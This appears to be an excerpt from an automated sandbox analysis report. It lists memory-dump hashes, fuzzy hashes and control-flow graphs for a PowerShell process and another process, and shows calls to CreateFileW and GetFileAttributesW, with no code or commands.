                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5df7e39f0fd8f792a3ef5fc17209e16ec75ad726d84f4af2b4b8d8a14f2f2e0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3421A8B4D042589FCB10CFA9D884ADEFBF4BB49324F14901AE918B7300C375A841CFA5
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e49e09d2ca08d614f9bc7b20a70bc7459f6a9c472deec912a62ff300ca5b81e0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: dca3320db7c84088e8a2ab12e00a183d80e6d73dbd4058189024b520e13075df
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e49e09d2ca08d614f9bc7b20a70bc7459f6a9c472deec912a62ff300ca5b81e0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D2129B1504340DFDB05DF54D9C0B26BB66FB88714F24856AE9094B286C776D806CBB3
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ca13c2f8d40f1bce21cbb1568697112816724313bdeaedece470659be9335e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 44c040cf99bf87323cdef058e2cd1139ab576abf7bbd732dbd7151b18e7f7b3d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca13c2f8d40f1bce21cbb1568697112816724313bdeaedece470659be9335e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 282101B0608240DFDB14DF64D9C4B26BBA6FB84718F24C56EE94D4B282C376D847C672
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: db849d6352f2e7ff752f9327480704b7f6d1cfa95dbd2260a92e76e47709dbd0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: da9de9d4c8bda3707db6d60b316fd04b5b278aac453c017ee2dd98d424916fb1
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db849d6352f2e7ff752f9327480704b7f6d1cfa95dbd2260a92e76e47709dbd0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F2190755093C08FDB12CF24C994B15BF71AB46314F28C5EBD8898B693C33A984ACB62
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe41ec4bf9022dd80f94a3e30c9fad58a81be37ffe9edd9398142aadc540e9ed
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f0d73dbe2ab03d122b01bbbe96be34331bfed22018ee6339aa0ea883a1758112
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe41ec4bf9022dd80f94a3e30c9fad58a81be37ffe9edd9398142aadc540e9ed
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111B676504380CFDB11DF54D9C4B56BF72FB84324F28C6AAD8084B696C336D85ACBA2
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c941c743422fc82b315ed16e4a0dd8ab57a33e6fad1e86a3a73f536fecd0a928
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E610FB0E042988FDB14CFA9D884BDEBBF5BB49318F10912AE515BB291DB749846CF44
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3fba785893b0db4f6140c9e3f51ead00e99cf5b394dc971c322eae3ddaed9c4b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E5120B0E0025C8FDB14CFA9D884B9EBBB5FB49308F109129E915BB390DBB49845CF85
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 48c043bf6604d069aff312cc7677b4425501003b3bc7e88dd0e23f62bf299cff
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351EEB0D0025C8FDB24CFA9D985BEEFBB5BB49308F20912AD515BB250DBB45846CF45
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 61dec2377dc50c6bb528909cab8098ed9e8b0820a145709c2720f855f4e71c27
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a038093a47b665b84747c64e86b5ca6217cc4ea224aef74133115b5d6a0381d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61dec2377dc50c6bb528909cab8098ed9e8b0820a145709c2720f855f4e71c27
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F510FB0D0025CCFDB14CFAAD885B9EBBB6BB89304F10A129E915BB250DB749845CF85
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: aeae6c0020a75c79477cf7b1c71a3af37def8b6c3881782cd970cc1d2133d891
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 99b30d3ca42fffe5732649c9667a01c2f183d399174e67f821d8a871ee2bbf80
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aeae6c0020a75c79477cf7b1c71a3af37def8b6c3881782cd970cc1d2133d891
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D251FFB0D0025C8FDB14CFAAD984BEEFBB5BB49304F209129E915BB250DBB49845CF85
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ec02d613002789c87627fbd0ee857e912a6e37af7f2b553d4d0408c363703d83
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d1498c26245b59b337e702908f18f170fdfc2637f03b5b0980e32a634d05b1c
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec02d613002789c87627fbd0ee857e912a6e37af7f2b553d4d0408c363703d83
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6951FEB0D0025C8FDB14CFA9D885BEEBBF6BB89308F10A12AD915BB250DB745845CF45
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:10
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 31874 7a6bda8 31880 7a6b65c 31874->31880 31876 7a6bddd 31878 7a6bea4 CreateFileW 31879 7a6bee1 31878->31879 31881 7a6be50 CreateFileW 31880->31881 31883 7a6bdc7 31881->31883 31883->31876 31883->31878 31884 7a602b8 31885 7a602fe GetFileAttributesW 31884->31885 31887 7a60337 31885->31887

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 0 7a6bda8-7a6bddb call 7a6b65c 4 7a6be06-7a6be9c 0->4 5 7a6bddd-7a6be05 0->5 14 7a6bea4-7a6bedf CreateFileW 4->14 15 7a6be9e-7a6bea1 4->15 16 7a6bee1-7a6bee7 14->16 17 7a6bee8-7a6bf05 14->17 15->14 16->17
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1be39ad83ab57a37ad4bb4b28f57eaebfa6eec4e085ca992556320a49fb0af34
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f5d9055780f6925929e76f04a20078879f95db2ae9690ccb5e5dd6ee7d3f73eb
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1be39ad83ab57a37ad4bb4b28f57eaebfa6eec4e085ca992556320a49fb0af34
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B41ACB1A042599FDB10DFA9C844B9EFBF5FF48314F158169EA18AB281C7749840CBE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 117 7a6be48-7a6be9c 120 7a6bea4-7a6bedf CreateFileW 117->120 121 7a6be9e-7a6bea1 117->121 122 7a6bee1-7a6bee7 120->122 123 7a6bee8-7a6bf05 120->123 121->120 122->123
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 66e4321c918819d76126d35598973e505ba5915f9cf1701b79b2322f833a39d2
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c417526105e42189d9ae73358d93ed0be99916ce0c21d6aca44a23a9f46a9006
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66e4321c918819d76126d35598973e505ba5915f9cf1701b79b2322f833a39d2
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 272114B590425AEFCF10CF9AD884ADEFBB4FF48314F10851AE924A7210C374A950CFA1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 126 7a6b65c-7a6be9c 129 7a6bea4-7a6bedf CreateFileW 126->129 130 7a6be9e-7a6bea1 126->130 131 7a6bee1-7a6bee7 129->131 132 7a6bee8-7a6bf05 129->132 130->129 131->132
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6BDC7,00000000,00000000,00000003,00000000,00000002), ref: 07A6BED2
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1bf3e77e23fd088362e8b2c1f605bee71c83b7a62f0ac34bf3056cf5f3ea47c4
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: dec6452d8c2b8f2437c927e01d585ef00b623d86085771a19079bd898b91bed7
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bf3e77e23fd088362e8b2c1f605bee71c83b7a62f0ac34bf3056cf5f3ea47c4
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 002139B6904259EFCF10CF99D844ADEFBB4FB48314F10811AEA24A7210C375A910CFE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 135 7a602b0-7a60302 138 7a60304-7a60307 135->138 139 7a6030a-7a60335 GetFileAttributesW 135->139 138->139 140 7a60337-7a6033d 139->140 141 7a6033e-7a6035b 139->141 140->141
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8dd6e18f41e524d6dfec5e51912e09b99740245b7731c3db068425b7c5204ad0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 47c520b748ba68e2e968744ba0af3bb230adc7298f1c6621ed77eb220205c0e6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dd6e18f41e524d6dfec5e51912e09b99740245b7731c3db068425b7c5204ad0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 972136B1C046599BCB14CFAAD544BDEFBF4FB48324F00851AD828A7640D774A941CFE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 144 7a602b8-7a60302 146 7a60304-7a60307 144->146 147 7a6030a-7a60335 GetFileAttributesW 144->147 146->147 148 7a60337-7a6033d 147->148 149 7a6033e-7a6035b 147->149 148->149
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 07A60328
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.809020766.0000000007A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A60000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7a60000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f2a12496a5c34d597b0c0d633a47877da29d5d5c066cfa8e1477b02c6f3d5364
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2ff175bd2dae8e76cec295ed55c9ac28ce4bcf5c24543c2f9fb8b876c3c8a0a5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2a12496a5c34d597b0c0d633a47877da29d5d5c066cfa8e1477b02c6f3d5364
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 611126B1D046599BCB14CF9AD548B9EFBF4FB88324F00811AD829B7240D774A945CFE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 152 497fc48-497fc5e 153 497fc60-497fc6a 152->153 154 497fc6c 152->154 155 497fc71-497fc73 153->155 154->155 156 497fc75-497fc81 155->156 157 497fc84-497fc8e 155->157 159 497fc90-497fc9c 157->159 160 497fc9f-497fca1 call 4977450 157->160 162 497fca6-497fca9 160->162 163 497fcaf-497fcb7 162->163 164 497fde8-497fdff 162->164 166 497fcbd-497fd44 163->166 167 497fd49-497fd4c 163->167 169 497fdd9-497fde5 166->169 168 497fd52-497fdd2 167->168 167->169 168->169
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: dl4l
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-736318344
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ab8ca68b85a0e7c07217e391b1d00bf572dba70ce89d96310285b0e8eb509548
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 94ce3b32c4721079d321b7b22358a08919b1fa93662f14497a52db4cba80745d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8ca68b85a0e7c07217e391b1d00bf572dba70ce89d96310285b0e8eb509548
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7541C072600A108FDB24DF78D84069EBBB6FFC5354F014A6AD601DB394DBB6A9048B92
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 592 4975e58-4975ea8 595 4975eb6 592->595 596 4975eaa-4975eb4 592->596 597 4975ebb-4975ebd 595->597 596->597 598 4975fa3-49760fb 597->598 599 4975ec3-4975ef2 597->599 649 49760fd call 7a61308 598->649 650 49760fd call 7a612f8 598->650 608 4975ef4-4975ef8 599->608 609 4975f6b-4975fa0 599->609 610 4975f1a-4975f38 608->610 611 4975efa-4975f12 608->611 610->609 621 4975f3a-4975f57 610->621 611->610 627 4975f65-4975f68 621->627 628 4975f59-4975f5b 621->628 627->609 628->627 643 4976103-497613d 648 4976145-4976149 643->648 649->643 650->643
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.784906636.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_4970000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bc055031eded40316f8244e04448bc398ec968ae0eeec2464d0e81cd4bf53994
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beb32c4f53e49ce8232d5aa62d4402dac27b8888c47deac35ac22bb620952b8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1981AC347006018FC708DF38D544A6EBBE2EF88358B1185A8E50ACB7A4DF75EC46CB90
